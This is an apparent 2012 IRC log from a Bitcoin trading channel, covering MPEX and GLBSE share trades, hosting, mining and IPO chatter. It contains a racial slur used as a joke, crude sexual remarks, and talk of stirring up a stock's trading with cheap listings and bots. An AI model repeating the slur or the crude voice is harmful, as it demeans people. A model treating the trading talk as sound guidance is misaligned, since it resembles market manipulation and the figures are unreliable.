Aug 21 09:09:11 i don't prefer simple reading. Aug 21 09:09:30 wtf is simple reading? Aug 21 09:09:40 reading is hard Aug 21 09:09:47 simple reading is when there's pictures Aug 21 09:10:11 Regards, Aug 21 09:10:11 Gina Smith Aug 21 09:10:22 simple reading is when it is programatically piped into my cath Aug 21 09:10:22 gina smith ? how exotic can you be. Aug 21 09:11:28 waht are you copypasta'ing in here mircea_popescu Aug 21 09:11:38 original content. Aug 21 09:11:41 actually lemme quote Aug 21 09:11:51 The articles are at $10 per page of 500 words Aug 21 09:11:51 and as mentioned earlier they are unique, original, copyscape proof and in Aug 21 09:11:51 simple English. Aug 21 09:12:20 copyscape proof Aug 21 09:12:34 say it five times quickly Aug 21 09:12:51 copy scapé Aug 21 09:13:26 so im helping a guy set up his new mpex acct, Aug 21 09:13:27 i really oughta go to bed now Aug 21 09:13:28 nn Aug 21 09:13:32 pympex asks for passphrase Aug 21 09:13:36 he's like... ummm... Aug 21 09:13:39 what's that. Aug 21 09:13:44 nn smickls Aug 21 09:13:45 oh no Aug 21 09:13:48 ya srsly Aug 21 09:14:05 haha Aug 21 09:14:09 ok its out https://bitcointalk.org/index.php?topic=102176.0 Aug 21 09:14:11 theres that asshole eskimobob in here Aug 21 09:14:16 he says pympex is too hard to use Aug 21 09:14:18 im like dude Aug 21 09:14:32 you cant type BUY|S.BVPS|20000|00498295 Aug 21 09:14:32 ? Aug 21 09:14:47 that's literally all there is to mpex Aug 21 09:14:55 [GLBSE] [BIB.PIRATE] 12 @ 0.7201 = 8.6412 BTC [-] Aug 21 09:14:57 ok, i hear you Aug 21 09:15:04 haha Aug 21 09:15:07 if someone bought that Aug 21 09:15:12 they'd buy some overvalued shares Aug 21 09:15:13 there is a massive need for a simple brokerage service Aug 21 09:15:17 our stock, based on earnings Aug 21 09:15:20 [MPEX] [S.MPOE] 99 @ 0.00039886 = 0.0395 BTC [+] Aug 21 09:15:21 should be around .0041 Aug 21 09:15:21 [MPEX] [S.MPOE] 15111 @ 0.00040237 = 6.0802 BTC [+] Aug 21 09:15:29 0041 - 0048 Aug 21 09:15:38 im waiting for brendio not to be busy Aug 21 09:15:45 then we're gonna throw some cheapr bvps shares on glbse Aug 21 09:16:18 wow Aug 21 09:16:22 someone on GLBSE is very smart Aug 21 09:16:34 they put a very very low bid Aug 21 09:16:37 but srsly, pympex is hard to use? Aug 21 09:16:38 and exploit the people who need to get out Aug 21 09:16:48 smickles depends smickles. Aug 21 09:16:49 it worked Aug 21 09:17:05 rg : isn't brendio marketmaking it ? Aug 21 09:17:15 i dont know what that means Aug 21 09:17:29 he puts bid/asks in to maintain liquidity Aug 21 09:17:35 [GLBSE] [BITBOND] 2 @ 0.3798 = 0.7596 BTC [+] Aug 21 09:17:35 mpoe.etf is market made, to an extent Aug 21 09:17:37 maybe Aug 21 09:17:39 i dunno Aug 21 09:17:50 !ticker mpoe.etf Aug 21 09:17:52 but im gonna do what i did to s.bvps Aug 21 09:17:52 [GLBSE:MPOE.ETF] [Bid: 1.36] [Ask: 1.4] [Spread: 0.04] [Last: 1.4] [24hVol: 2.8] [7dAvg: 1.40159981] Aug 21 09:17:56 to get it JUMP started Aug 21 09:18:01 it worked perfectly for bvps Aug 21 09:18:03 even if its bots Aug 21 09:18:11 jesus this is so much better than going to the site. Aug 21 09:18:13 no one wants to trade a stock that doesnt move Aug 21 09:18:38 lol, yeah, glbse is slooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooow Aug 21 09:19:06 its written in python Aug 21 09:19:08 what do you expect Aug 21 09:19:14 tell him to recode it in C Aug 21 09:19:15 will be a lot faster by the end of today Aug 21 09:19:18 is it really? Aug 21 09:19:20 GLBSE is in ruby Aug 21 09:19:25 oh god Aug 21 09:19:26 that's even worse Aug 21 09:19:30 haha Aug 21 09:19:36 nefario1: way to re-enforce a stereotype Aug 21 09:19:38 nj Aug 21 09:19:54 I've already commented on some of teh reasons why it's slow Aug 21 09:20:01 not especially becuase it's ruby Aug 21 09:20:06 iknow, iknow Aug 21 09:20:15 at least its not in Java Aug 21 09:20:16 it's still slow :/ Aug 21 09:20:17 Ruby 1.8.7-p370 released Aug 21 09:20:17 As we posted earlier, we provide you a normal bugfix-only relrease of 1.8.7 now. Aug 21 09:20:17 Ruby 1.8.7 was released on June 1st, 2008. This release is to celebrate its fourth birthday. Thank you all. Aug 21 09:20:17 Continue Reading… Aug 21 09:20:17 Posted by Urabe Shyouhei on 29 Jun 2012 Aug 21 09:20:20 this seems kinda sad. Aug 21 09:20:30 nothing runs in 1.8 anymore Aug 21 09:20:40 kakobrekla: testing, waiting for confirm Aug 21 09:20:40 this is the top post on their site thingee. Aug 21 09:20:47 http://www.ruby-lang.org/en/ Aug 21 09:20:50 thanks bitfoo Aug 21 09:20:55 nefario1: glbse uses 1.8 doesnt it Aug 21 09:20:58 honestly i thought ruby is dead like ada. Aug 21 09:21:04 naw Aug 21 09:21:07 ruby is a buzzword man Aug 21 09:21:08 RoR Aug 21 09:21:10 lemme know how it goes bitfoo Aug 21 09:21:22 kakobrekla: of course Aug 21 09:21:29 if you say ruby on rails recruiters balls get all wet Aug 21 09:21:30 (2:20:54 PM) rg: nefario1: glbse uses 1.8 doesnt it Aug 21 09:21:32 1.63 Aug 21 09:21:35 is bitfoo the first 'real world' test? Aug 21 09:21:36 sorry Aug 21 09:21:37 sweet jesus Aug 21 09:21:38 thats 1.6.3 Aug 21 09:21:40 well Aug 21 09:21:49 I kid I kid Aug 21 09:21:49 if you call 0.1 BTC "real-world" Aug 21 09:21:50 nefario1, if you can pimp up your api i will add you as well Aug 21 09:22:03 we don't use 1.8 Aug 21 09:22:07 i was going to offer to do it on bitvps Aug 21 09:22:13 but our system marks paid on 1 confirm Aug 21 09:22:24 so it doesnt really matter Aug 21 09:22:33 yeah it doesn't matter for bitvps Aug 21 09:22:41 as it's a service that can be switched off Aug 21 09:22:43 "The syntax of Ruby is broadly similar to Perl and Python." Aug 21 09:22:54 call me crazy Aug 21 09:22:57 but id rather just use bash Aug 21 09:22:59 mircea_popescu: is this the first time you've heard of the language? Aug 21 09:22:59 or C Aug 21 09:23:01 depending on the job Aug 21 09:23:02 things like these make you think the person who wrote it thinks all programming languages are the same Aug 21 09:23:20 nefario1 no, i heard of it before, but as i said, i had it filed under "fancy thing that went nowjhere" Aug 21 09:23:25 that statement is broadly speaking, correct Aug 21 09:23:41 twitter was built using ruby Aug 21 09:23:41 well yes, broadly speaking it is. Aug 21 09:23:44 as were many other sites Aug 21 09:23:47 ;;tslb Aug 21 09:23:50 Time since last block: 1 minute and 34 seconds Aug 21 09:23:52 glbse doesnt render properly in my old ass browser Aug 21 09:24:04 yeah, twitter is the pinical of stability Aug 21 09:24:06 the bottom two tabs content is visible Aug 21 09:24:15 i thought twitter was on blender Aug 21 09:24:17 bitfoo, its done? Aug 21 09:24:23 which im not saying is any better, java crap. Aug 21 09:24:24 kakobrekla: Aug 21 09:24:26 oops Aug 21 09:24:26 taht's why the term 'fail whale' happened Aug 21 09:24:28 yes, I see it Aug 21 09:24:37 and I got a mtgox code too Aug 21 09:24:52 cool? everything clear? Aug 21 09:25:06 mtgox is slow ;) Aug 21 09:25:13 kakobrekla: what kind of fees are you thinking Aug 21 09:25:18 doesn't twitter have a 'beiber only' server? Aug 21 09:25:18 after beta Aug 21 09:25:21 rg 20 btc. Aug 21 09:25:23 decent amount o fmoney to be made Aug 21 09:25:24 kakobrekla: yep, all good Aug 21 09:25:30 cool! Aug 21 09:25:33 yay Aug 21 09:25:44 id love it if you can say something on teh forums Aug 21 09:25:45 this is seriously useful Aug 21 09:25:47 kakobrekla: we'll be able to promote your site in -otc Aug 21 09:25:51 sure Aug 21 09:25:57 tons of people are always complaining about depositing to mtgox Aug 21 09:26:23 well, about the fees, i was asking here yesterday what you guys think Aug 21 09:26:33 0.5% ? Aug 21 09:26:45 honestly, kakobrekla, i'd keep it 1/2 satoshi till you go over 1k daily users. Aug 21 09:26:48 I think fees roughly equal to mtgox fees would be fair Aug 21 09:27:08 0.22% Aug 21 09:27:08 you don;'t need the money, so regard it as an investment into marketshare. Aug 21 09:27:20 pff sure he needs it Aug 21 09:27:25 everyone needs money Aug 21 09:27:29 especially me Aug 21 09:27:31 everyone can use money Aug 21 09:27:34 theres a difference. Aug 21 09:28:44 if i can buy a car, i want a house, if a house, i want a yacht, if a yacht, a fleet, if a fleet, a harbor, if a harbor, a city, if a city a nation, if a nation... a new world order Aug 21 09:29:04 I wat an aircraft carrier Aug 21 09:29:07 I'll stop at that Aug 21 09:29:09 promise Aug 21 09:29:12 lol Aug 21 09:29:31 what are you going to do with an AC carrier? Aug 21 09:29:35 i dont want a yacht. Aug 21 09:29:38 too much bloody work. Aug 21 09:30:12 smickles: what COULDN'T you do with an aircraft carrier Aug 21 09:30:21 if it's nuclear Aug 21 09:30:23 buttsex. Aug 21 09:30:24 invade 'merica Aug 21 09:30:27 then start a floating city Aug 21 09:30:33 THE RAFT Aug 21 09:30:49 wasn't there some micronation on an ld abandonedp latform ? Aug 21 09:30:58 yes Aug 21 09:31:04 platform caught fire Aug 21 09:31:09 micronation ended Aug 21 09:31:12 ya l;ol Aug 21 09:31:14 exactly Aug 21 09:31:21 then they were selling fake passports or some shit Aug 21 09:31:27 ld abandonedp? mp, you drinking ag 6am or whtvr? Aug 21 09:31:28 not fake Aug 21 09:31:36 didn't you read Aug 21 09:31:41 it was a micro-NATION Aug 21 09:31:44 my spac ebar isf unny Aug 21 09:31:48 they had the right to issue passports Aug 21 09:31:55 they were perfectly legit Aug 21 09:31:55 well... micropassports. Aug 21 09:31:59 sealand Aug 21 09:32:08 (next to UK) Aug 21 09:32:10 o ya. the principality of sealand Aug 21 09:32:11 just because they weren't worth shit doesn't mean anything Aug 21 09:32:19 ahaha i like this philosophy Aug 21 09:32:24 we should get rg a bunch of gold Aug 21 09:32:28 for all the service he gives us Aug 21 09:32:38 how about hookers and blow. Aug 21 09:32:40 oh rumor alert Aug 21 09:32:49 funny, i heard rg say that one time Aug 21 09:32:49 slush's pool is probably moving to bitvps Aug 21 09:32:58 nice Aug 21 09:33:00 oh Aug 21 09:33:06 Twitter had approximately ninety-eight percent uptime in 2007 (or about six full days of downtime) Aug 21 09:33:12 ahahaha 98% uoptime :D :D :D Aug 21 09:33:17 how many servers / what kind of load does he have rg? Aug 21 09:33:18 he's getting a really nice box Aug 21 09:33:32 bitfoo: his pool has been around forever.. he knows how to tweak it Aug 21 09:33:35 it doesn't take much to run Aug 21 09:33:35 one server? Aug 21 09:33:41 interesting Aug 21 09:34:01 mircea_popescu: yeah, it's hard keeping uptime when you actually have users Aug 21 09:34:04 he's also potentially getting a 12 core box Aug 21 09:34:06 so Aug 21 09:34:10 hehe awesome Aug 21 09:34:11 even worse if you've got lots Aug 21 09:34:12 one server isnt always a bad thing Aug 21 09:34:12 :P Aug 21 09:34:23 i dont remember google being out. Aug 21 09:34:34 im trying to sell him the same node as cal2.vm.bitvps.com Aug 21 09:34:36 but its too pricey Aug 21 09:34:39 when asics roll out I assume pool ops will be moving to higher difficulty shares Aug 21 09:34:39 alright, srsly guys, thistime, shut up long engought so that i can close the window and go to be without seeing someting interesting Aug 21 09:34:42 that box is awesome Aug 21 09:34:46 even awesomer when it doesnt explode Aug 21 09:34:46 nn smickles Aug 21 09:34:49 nn Aug 21 09:35:03 no niggers? Aug 21 09:35:04 dude Aug 21 09:35:04 rg do you cool it with frigid virgin blood ? Aug 21 09:35:06 you guys are rcaist Aug 21 09:35:11 it's nAggers Aug 21 09:35:21 you need a diareis on the g Aug 21 09:35:28 jezuz i miss vraknaroada. Aug 21 09:35:33 mircea_popescu: it doesnt get that hot Aug 21 09:35:56 December 17, 2009 – A hacking attack replaced the website's welcoming screen with an image of a green flag and the caption "This site has been hacked by Iranian Cyber Army" for nearly an hour. No connection between the hackers and Iran has been established Aug 21 09:36:04 lokl ok, twitter is lulzwhale. Aug 21 09:36:50 System Temp Normal 32 ° C Aug 21 09:36:50 Peripheral Temp Normal 39 ° C Aug 21 09:36:50 PCH Temp Normal 45 ° C Aug 21 09:37:16 get ready for this flood Aug 21 09:37:18 Normal 12150 RPM Aug 21 09:37:18 FAN2 Normal 12600 RPM Aug 21 09:37:18 FAN3 Normal 12600 RPM Aug 21 09:37:18 FAN4 Normal 12675 RPM Aug 21 09:37:18 FANA Normal 12225 RPM Aug 21 09:37:19 FANB Normal 13350 RPM Aug 21 09:37:27 moar fanz Aug 21 09:37:59 [MPEX] [F.GIGA.ETF] 12000 @ 0.00097335 = 11.6802 BTC [-] Aug 21 09:38:08 Current Power Consumption: 221 watts Aug 21 09:38:20 In response to Twitter's security breaches, the Federal Trade Commission brought charges against the service which were settled on June 24, 2010. This was the first time the FTC had taken action against a social network for security lapses. Aug 21 09:38:24 ahaha ok this is... lol! Aug 21 09:38:33 twiter is a joke Aug 21 09:38:35 they run windoze Aug 21 09:38:39 that's why they go down all hte time Aug 21 09:38:41 i just didn't know they were SUCH A GOOD ONE Aug 21 09:38:42 same problem myspace had Aug 21 09:43:23 hmmm, bopped off Aug 21 09:43:27 and im back Aug 21 09:44:21 bopped off? Aug 21 09:45:50 [GLBSE] [OBSI.HRPT] 5 @ 0.1029 = 0.5145 BTC [+] Aug 21 09:47:46 [GLBSE] [BDK.BND] 45 @ 0.101 = 4.545 BTC [-] Aug 21 09:51:03 [MPEX] [S.MPOE] 2300 @ 0.00041125 = 0.9459 BTC [+] Aug 21 09:56:00 https://bitcointalk.org/index.php?topic=102181.0 Aug 21 09:56:13 Gamma SatoshiDICE Pass Through :) Aug 21 09:56:41 [GLBSE] [ASICMINER] 20 @ 0.09899899 = 1.98 BTC [-] Aug 21 09:56:42 [GLBSE] [ASICMINER] 480 @ 0.0989998 = 47.5199 BTC [+] Aug 21 10:02:04 o hey wd DeaDTerra Aug 21 10:02:09 what;'s the ticker ? Aug 21 10:02:24 !ticker GSDPT Aug 21 10:02:26 Invalid ticker. Aug 21 10:02:26 GSDPT Aug 21 10:02:37 It has not yet need verified by Nefario Aug 21 10:02:43 a Aug 21 10:02:57 but I talked to Nefario yesterday and he was all fine with it, so it's just a matter of time Aug 21 10:03:48 The IPO will be on the 24th at 20:00 GMT each share will be sold for 0.0032 BTC. Aug 21 10:03:53 isn't that a little narrow ? Aug 21 10:04:00 why not ipo on the 23rd or something Aug 21 10:05:27 Buy KRAKEN, the passthru that smells fishy! (hmm, I'd better pay a visit to the marketing department about that one.) Aug 21 10:05:51 !ticker KRAKEN Aug 21 10:05:53 [GLBSE:KRAKEN] [Bid: 0.004] [Ask: 0.01] [Spread: 0.006] [Last: 0.01] [24hVol: 187.97] [7dAvg: 0.01] Aug 21 10:06:10 i love those people bidding 0.004 Aug 21 10:06:24 i mean... what is gonna happen, someone typoes Aug 21 10:06:30 I don't think it really matter, as the shares will not pay dividends immdetiatly Aug 21 10:06:34 so there's really no stress Aug 21 10:07:15 yeah it's not like there won't be any shares left over Aug 21 10:07:53 i think they only pay next month yea. Aug 21 10:07:57 how many are you creating ? Aug 21 10:07:59 there's already 1/5th of capacity sold =/ Aug 21 10:08:31 In less than 24 hours Aug 21 10:08:41 in kraken you mean ? Aug 21 10:09:27 Aye Aug 21 10:09:35 pretty good. Aug 21 10:10:58 [MPEX] [F.GIGA.ETF] 6400 @ 0.00097335 = 6.2294 BTC [-] Aug 21 10:10:59 [MPEX] [F.GIGA.ETF] 8200 @ 0.00098797 = 8.1014 BTC [+] Aug 21 10:16:13 [GLBSE] [FPGAMINING] 1 @ 0.97 BTC [+] Aug 21 10:18:33 startin with 250 BTC worth of shares Aug 21 10:18:40 if there's more demand I will just issue more Aug 21 10:18:57 Kraken is Patricks project of course it will sell fast ;) Aug 21 10:19:04 everyone likes Patrick including me :) Aug 21 10:20:03 o wow. Aug 21 10:20:07 that bad eh ? Aug 21 10:20:13 I love the naming schemes here Aug 21 10:20:58 [MPEX] [F.GIGA.ETF] 4400 @ 0.00099659 = 4.385 BTC [+] Aug 21 10:23:32 hey what's that stupid remote desktop program Aug 21 10:23:35 I hear Kraken #2 might have 2% max weekly instead of 2.5% for Kraken#1 Aug 21 10:23:37 the one that lets you login with a pin Aug 21 10:23:44 and the linux client is just a wine chroot Aug 21 10:23:46 any ideas? Aug 21 10:23:57 Seems good for the passthrough Aug 21 10:24:16 Makes it worthwhile compared to just joining Kraken #2 Aug 21 10:24:34 teamviewer Aug 21 10:24:36 that's it Aug 21 10:24:44 not citrix? Aug 21 10:24:48 hate citrix Aug 21 10:25:05 where I did my undergrad ran on citrix Aug 21 10:25:29 i hate teamviewer Aug 21 10:25:31 everyone likes it Aug 21 10:25:36 its such a piece of shit Aug 21 10:25:57 [GLBSE] [FPGAMINING] 1 @ 0.97 BTC [+] Aug 21 10:28:53 god fucking damn it Aug 21 10:28:57 i missed out on s.mpoe again Aug 21 10:29:26 lol ? Aug 21 10:29:30 !ticker s.mpoe Aug 21 10:29:32 [MPEX:S.MPOE] 1day: 0.0003536 / 0.00039132 / 0.00041245 (8135535 shares, 3,183.60 BTC), 30day: 0.0001 / 0.00036314 / 0.00041245 (53679512 shares, 19,493.65 BTC) Aug 21 10:29:43 what about it. Aug 21 10:29:43 i was going to buy in much cheaper Aug 21 10:29:45 and i forgot Aug 21 10:29:48 now its up Aug 21 10:29:49 a ton Aug 21 10:29:57 i wouldve made like 30 btc Aug 21 10:30:09 was it that low ? Aug 21 10:30:30 ya 35... i guess a decent 10% there huh Aug 21 10:31:12 arf Aug 21 10:37:37 nefario: you mentioned some time ago that the div payments will also be announced via the tweeter feed. any idea when this will happen? Aug 21 10:38:41 [GLBSE] [NYAN.C] 48 @ 0.988 = 47.424 BTC [+] Aug 21 10:40:36 [MPEX] [S.MPOE] 3244 @ 0.00041125 = 1.3341 BTC [+] Aug 21 10:40:38 [MPEX] [S.MPOE] 3456 @ 0.00041255 = 1.4258 BTC [+] Aug 21 10:40:50 didn't you ask me about this yesterday tonikt? Aug 21 10:41:14 it prolly was someone else Aug 21 10:41:22 you're on a special irc programme lol Aug 21 10:41:32 [MPEX] [S.MPOE] 10054 @ 0.00041255 = 4.1478 BTC [+] Aug 21 10:42:04 it's in the dev que anyway Aug 21 10:42:15 after some other elements are done Aug 21 10:42:19 one of them arriving today Aug 21 10:42:31 btw Nefario is the new availibity system implemented yet? Aug 21 10:42:32 :D Aug 21 10:42:37 can I go place my awesome bid walls now? Aug 21 10:43:49 lol http://www.thatcutesite.com/uploads/2011/08/happy_hamster_in_sawdust-600x467.jpg Aug 21 10:43:57 hamster in bidwalls Aug 21 10:44:02 DeaDTerra: end of today Aug 21 10:46:14 nefario: no - yestarday I asked you if assbot is more reliable than the twitter feed Aug 21 10:46:39 ah Aug 21 10:47:44 [GLBSE] [ASICMINER] 10 @ 0.0975 = 0.975 BTC [-] Aug 21 10:47:46 [GLBSE] [ASICMINER] 15 @ 0.0951 = 1.4265 BTC [-] Aug 21 10:47:47 [GLBSE] [ASICMINER] 3 @ 0.095 = 0.285 BTC [-] Aug 21 10:48:08 [GLBSE] [NYAN.C] 3 @ 0.988 = 2.964 BTC [+] Aug 21 10:51:33 [MPEX] [F.GIGA.ETF] 9400 @ 0.00103616 = 9.7399 BTC [+] Aug 21 11:06:53 [GLBSE] [PUREMINING] 1 @ 0.12710202 BTC [-] Aug 21 11:06:55 [GLBSE] [PUREMINING] 1 @ 0.12710202 BTC [-] Aug 21 11:06:56 [GLBSE] [PUREMINING] 1 @ 0.12710201 BTC [-] Aug 21 11:06:57 [GLBSE] [PUREMINING] 8 @ 0.12710201 = 1.0168 BTC [-] Aug 21 11:12:08 [GLBSE] [GIGAMINING] 1 @ 1.01 BTC [-] Aug 21 11:12:10 [GLBSE] [GIGAMINING] 1 @ 1.0062 BTC [-] Aug 21 11:12:44 [GLBSE] [BDT] 1 @ 1.03 BTC [+] Aug 21 11:23:34 [GLBSE] [UDN] 1 @ 0.1089 BTC [+] Aug 21 11:23:45 [GLBSE] [GIGAMINING] 2 @ 1.0354 = 2.0708 BTC [+] Aug 21 11:25:57 [GLBSE] [BDK.BND] 50 @ 0.101 = 5.05 BTC [-] Aug 21 11:26:49 [GLBSE] [UDN] 4 @ 0.108999 = 0.436 BTC [+] Aug 21 11:32:10 [GLBSE] [NYAN.C] 15 @ 0.95 = 14.25 BTC [-] Aug 21 11:33:44 [MPEX] [S.MPOE] 20390 @ 0.00041255 = 8.4119 BTC [+] Aug 21 11:33:45 [MPEX] [S.MPOE] 2403 @ 0.00041337 = 0.9933 BTC [+] Aug 21 11:33:55 [MPEX] [F.GIGA.ETF] 3435 @ 0.00099514 = 3.4183 BTC [-] Aug 21 11:33:56 [MPEX] [F.GIGA.ETF] 10094 @ 0.00097186 = 9.81 BTC [-] Aug 21 11:33:58 [MPEX] [F.GIGA.ETF] 4471 @ 0.00095898 = 4.2876 BTC [-] Aug 21 11:45:10 [GLBSE] [ASICMINER] 15 @ 0.098699 = 1.4805 BTC [+] Aug 21 11:45:53 [GLBSE] [ASICMINER] 58 @ 0.098799 = 5.7303 BTC [+] Aug 21 11:46:31 so my call on pirate, for the record was that he was washing lindens Aug 21 11:53:35 [GLBSE] [FOO.PPPPT] 1 @ 0.839799 BTC [+] Aug 21 11:54:18 [GLBSE] [SILVER] 9 @ 0.00999999 = 0.09 BTC [+] Aug 21 11:54:36 [MPEX] [S.MPOE] 16200 @ 0.00041337 = 6.6966 BTC [+] Aug 21 12:02:52 [GLBSE] [METAL.SILVER] 1 @ 0.099999 BTC [+] Aug 21 12:07:38 [GLBSE] [TYGRR.BOND-P] 15 @ 0.72 = 10.8 BTC [+] Aug 21 12:07:40 [GLBSE] [TYGRR.BOND-P] 10 @ 0.71013371 = 7.1013 BTC [-] Aug 21 12:07:41 [GLBSE] [TYGRR.BOND-P] 6 @ 0.7101337 = 4.2608 BTC [-] Aug 21 12:09:34 [GLBSE] [KRAKEN] 40 @ 0.01 = 0.4 BTC Aug 21 12:14:08 [GLBSE] [TYGRR.BOND-P] 59 @ 0.82 = 48.38 BTC [+] Aug 21 12:15:08 [GLBSE] [PLATINUM] 10 @ 0.00999899 = 0.1 BTC [+] Aug 21 12:16:15 [GLBSE] [RAREEARTH] 10 @ 0.00983999 = 0.0984 BTC [+] Aug 21 12:20:04 [GLBSE] [SILVER] 1 @ 0.01 BTC [+] Aug 21 12:39:43 [GLBSE] [NYAN.C] 6 @ 0.988 = 5.928 BTC [+] Aug 21 12:41:16 so my call on pirate, for the record was that he was washing lindens << ahaha Aug 21 12:41:18 did he pay yet ? Aug 21 12:42:08 no Aug 21 12:50:14 right. Aug 21 12:53:31 weeeeelp Aug 21 12:53:34 i sold my litecoins Aug 21 12:53:43 no loss, technically Aug 21 12:53:56 i put it all into bitvps Aug 21 13:00:39 litecoins can be sold !? Aug 21 13:01:45 ofcourse Aug 21 13:01:48 i just took in 35 btc Aug 21 13:01:53 not so bad. Aug 21 13:01:59 last week i took in over 40 btc Aug 21 13:02:07 o you mine them ? Aug 21 13:02:11 sometimes Aug 21 13:02:17 when the market was low earlier this week Aug 21 13:02:21 i bough them at 002 Aug 21 13:02:25 and sold them at 004 right now Aug 21 13:02:28 o hey Aug 21 13:02:29 lol Aug 21 13:02:32 but i chickened out Aug 21 13:02:34 i shoulda bought more Aug 21 13:02:58 i get nervious Aug 21 13:03:04 cause i was using the bitvps div payout to do it Aug 21 13:03:06 i dint wanna lose it Aug 21 13:03:10 so i played cautious Aug 21 13:03:24 don't do that eh! Aug 21 13:03:28 why not Aug 21 13:03:29 its my money Aug 21 13:03:49 well ya but wat if you lose! Aug 21 13:03:59 then i would have lost it Aug 21 13:04:01 hence the careful ness Aug 21 13:04:12 had i just ran with it Aug 21 13:04:18 i coulda turned 60 btc into a lot more Aug 21 13:04:21 but i only did 9 btc Aug 21 13:04:34 hopefully the damn ltc market goes up Aug 21 13:04:39 if it gets to 0.006 Aug 21 13:04:44 i start making real profit Aug 21 13:04:47 like $650/wk Aug 21 13:04:55 pretty cool. Aug 21 13:05:12 meh Aug 21 13:05:15 i give it all to bitvps anyway Aug 21 13:05:20 its not really profit Aug 21 13:05:25 so much as its money i already spnt that i need to replace Aug 21 13:05:58 im still trying to get bitvps to have 1,000 btc Aug 21 13:06:15 but i keep spending it on projects that get half completed Aug 21 13:06:19 god admn it Aug 21 13:06:23 don't do tat. Aug 21 13:06:28 like this fucking website Aug 21 13:06:32 and this fucking control panel Aug 21 13:06:41 this control panel has been a real cash pit Aug 21 13:06:54 but its pretty much ready Aug 21 13:07:01 so then roll it out Aug 21 13:07:02 but i keep testing it Aug 21 13:07:04 well no Aug 21 13:07:05 im afraid Aug 21 13:07:10 what if people get owned cause something i missed Aug 21 13:07:17 then you take it in the ass Aug 21 13:07:19 that is why it is in a perpetual state of dev Aug 21 13:07:27 [MPEX] [S.MPOE] 46200 @ 0.0004117 = 19.0205 BTC [-] Aug 21 13:07:28 [MPEX] [S.MPOE] 1990 @ 0.00040657 = 0.8091 BTC [-] Aug 21 13:07:30 [MPEX] [S.MPOE] 6810 @ 0.00037939 = 2.5836 BTC [-] Aug 21 13:07:30 that;'s no way to write software Aug 21 13:07:33 ive honestly yet to find 1 vulnerability in it Aug 21 13:09:27 oo Aug 21 13:09:28 ww Aug 21 13:09:31 wow Aug 21 13:09:35 i already have anothre 1000 ltc Aug 21 13:10:44 lol Aug 21 13:10:55 i just paid my power bill. Aug 21 13:11:07 ~80 bucks, covers two months. Aug 21 13:11:14 not bad Aug 21 13:11:14 fucking glbse Aug 21 13:11:17 that's not bad at all Aug 21 13:11:17 i have ~5 boxes pretty much always on, Aug 21 13:11:22 10 confirms on this deposit Aug 21 13:11:30 we have 4 airconditioners toal Aug 21 13:11:30 i have a water pump for my garden, i have ALL SORTS OF SHIT Aug 21 13:11:35 plus my quad core that runs 24/7 Aug 21 13:11:44 dub doth not want your moneh ? Aug 21 13:12:15 how much power does cpu mining use? Aug 21 13:16:20 well, theyre gpus Aug 21 13:16:21 and a lot Aug 21 13:16:42 unplugged the dryer to use its power socket Aug 21 13:20:58 is it more profitable with gpu? Aug 21 13:21:12 than bitcoin Aug 21 13:22:14 well Aug 21 13:22:15 it was Aug 21 13:22:30 when it was .006 btc per ltc Aug 21 13:22:37 difficulty is going up too as it gains popularity Aug 21 13:22:52 ;;bc,stats Aug 21 13:22:53 Current Blocks: 194982 | Current Difficulty: 2190865.9701029 | Next Difficulty At Block: 195551 | Next Difficulty In: 569 blocks | Next Difficulty In About: 3 days, 11 hours, 36 minutes, and 41 seconds | Next Difficulty Estimate: 2465782.42829686 | Estimated Percent Change: 12.5483010803 Aug 21 13:23:00 ;;bc,diffchange Aug 21 13:23:01 Estimated percent change in difficulty this period | 12.5483010803 % based on data since last change | 24.5884884616 % based on data for last three days Aug 21 13:23:06 motherfucker Aug 21 13:23:36 yeah Aug 21 13:23:38 that's insane Aug 21 13:24:40 buncha fpgas going online ? Aug 21 13:25:17 possibly Aug 21 13:25:20 who knows Aug 21 13:25:23 a few bfl mini rigs being delivered Aug 21 13:25:30 believe it when i see it Aug 21 13:25:37 those minirigs are going to make mining so unprofitable Aug 21 13:25:42 fpga rigs Aug 21 13:26:03 you cant even make a real amount now without 1GH of miners Aug 21 13:26:04 inaba was talking about some arriving, and some asshat that had no idea about mining Aug 21 13:28:00 [MPEX] [O.BTCUSD.P190T] 10628 @ 1.055 = 11212.54 BTC [+] Aug 21 13:30:58 [GLBSE] [ASICMINER] 4 @ 0.098799 = 0.3952 BTC [+] Aug 21 13:32:07 Okay, whoever was holding BITKOIN.SOURCE before I shut it down... Aug 21 13:32:16 That one measley share Aug 21 13:32:28 that you tried to extort me at 5 times its original cost Aug 21 13:32:38 I will buy it back for .1 BTC and no more. Aug 21 13:33:03 lol Aug 21 13:33:11 is anyone heres name Edward B. ? Aug 21 13:33:20 im trying to work this out.. Aug 21 13:33:28 im checking out this guys account @ bitvps and he prepaid for a while Aug 21 13:33:30 but his VPS was off Aug 21 13:33:36 so im trying to see if that's the proper VPS or not Aug 21 13:33:38 if it is Aug 21 13:33:41 why was it off Aug 21 13:34:41 [GLBSE] [BITBOND] 9 @ 0.379 = 3.411 BTC [-] Aug 21 13:35:04 aww poor EmanuelDeOrtego Aug 21 13:35:12 Emanuel Aug 21 13:35:14 fuck em Aug 21 13:35:22 just close it tell him he had his chance Aug 21 13:36:13 Well, he emailed ColdHardMetal. I am offering to buy it at its original price again. Aug 21 13:36:44 Anyways, can we transfer issuer rights to other people? Aug 21 13:36:59 so you are pissing and moaning over .5 btc? Aug 21 13:37:33 I might be Jewish. Aug 21 13:40:08 ok, any glbse wizards that can explain this http://polimedia.us/dtng/c/src/134554559271.png ? Aug 21 13:47:37 [GLBSE] [POLY.10.1] 9 @ 1 = 9 BTC [-] Aug 21 13:48:12 Yay! Aug 21 13:48:16 Meni finally did it! Aug 21 13:51:45 [GLBSE] [PPT.DIV] 1 @ 0.235 BTC [-] Aug 21 13:52:43 [GLBSE] [PAJKA.BOND] 1 @ 0.09298999 BTC [+] Aug 21 13:53:13 EmanuelDeOrtego Aug 21 13:53:16 success? Aug 21 13:53:27 kakobrekla put the kaibosh on netxshare this is getting ridiculous Aug 21 13:54:01 EmanuelDeOrtego what he do ? Aug 21 13:54:47 Oh, he just cashed some bonds I had. Aug 21 13:57:03 [MPEX] [F.GIGA.ETF] 13800 @ 0.00101784 = 14.0462 BTC [+] Aug 21 13:57:37 mircea_popescu: /ignore netxshare JOINS QUITS Aug 21 13:57:51 [GLBSE] [BIB.PIRATE] 26 @ 0.899999 = 23.4 BTC [+] Aug 21 